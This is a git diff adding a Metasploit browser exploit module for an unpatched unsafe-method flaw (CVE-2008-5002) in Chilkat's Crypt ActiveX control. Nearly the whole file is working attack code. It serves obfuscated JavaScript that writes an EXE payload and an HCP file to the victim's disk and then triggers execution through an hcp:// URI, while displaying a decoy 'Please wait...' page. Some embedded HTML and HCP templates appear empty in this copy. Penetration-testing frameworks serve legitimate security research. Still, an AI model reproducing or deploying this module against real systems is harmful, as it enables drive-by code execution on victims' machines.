diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
new file mode 100644
index 0000000000..420cb8a6f2
--- /dev/null
+++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
@@ -0,0 +1,141 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Chilkat Crypt ActiveX WriteFile Unsafe Method',
+ 'Description' => %q{
+ This module allows attackers to execute code via the 'WriteFile' unsafe method of
+ Chilkat Software Inc's Crypt ActiveX control.
+
+ This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to
+ execute our payload immediately. However, this method requires that the victim user
+ be browsing with Administrator. Additionally, this method will not work on newer
+ versions of Windows.
+
+ NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at
+ the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'shinnai', 'jduck' ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2008-5002' ],
+ [ 'OSVDB', '49510' ],
+ [ 'BID', '32073' ],
+ [ 'URL', 'http://www.exploit-db.com/exploits/6963' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2048
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ ],
+ 'DefaultTarget' => 0))
+
+ end
+
+ def autofilter
+ false
+ end
+
+ def check_dependencies
+ use_zlib
+ end
+
+ def on_request_uri(cli, request)
+
+ # Set parameters
+ fnname = rand_text_alpha(8+rand(8))
+ si_name = "msinfo" # must be this, other names don't seem to work
+ exe_name = rand_text_alpha(8+rand(8))
+ hcp_path = "C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\#{si_name}.htm"
+ hcp_url = "hcp:\\x2f\\x2fsystem/sysinfo/#{si_name}.htm"
+ exe_path = "C:\\#{exe_name}.exe"
+
+ # Generate HCP data
+ hcp_data = %Q|
+
+|
+
+ # (Re-)Generate the EXE payload
+ return if ((p = regenerate_payload(cli)) == nil)
+ exe_data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
+
+ # Encode variables
+ hcp_str = Rex::Text.to_unescape(hcp_data)
+ hcp_path.gsub!(/\\/, '\\\\\\\\')
+ exe_str = Rex::Text.to_unescape(exe_data)
+ exe_path.gsub!(/\\/, '\\\\\\\\')
+
+ # Build the final JS
+ js = %Q|
+function #{fnname}()
+{
+ var my_unescape = unescape;
+ var obj = new ActiveXObject("ChilkatCrypt2.ChilkatCrypt2");
+ var exe_path = "#{exe_path}";
+ var exe_str = "#{exe_str}";
+ var exe_data = my_unescape(exe_str);
+ obj.WriteFile(exe_path, exe_data);
+ var hcp_str = "#{hcp_str}";
+ var hcp_data = my_unescape(hcp_str);
+ var hcp_path = "#{hcp_path}";
+ obj.WriteFile(hcp_path, hcp_data);
+ window.location = "#{hcp_url}";
+}
+|
+
+ # Obfuscate the javascript
+ opts = {
+ 'Strings' => false, # didn't work in this case
+ 'Symbols' => {
+ 'Variables' => %w{ my_unescape obj exe_path exe_str exe_data hcp_str hcp_data hcp_path }
+ }
+ }
+ js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
+ js.obfuscate()
+
+ # Build the final HTML
+ content = %Q|
+
+
+
+
+Please wait...
+
+
+|
+
+ print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+ send_response_html(cli, content)
+
+ handler(cli)
+
+ end
+
+end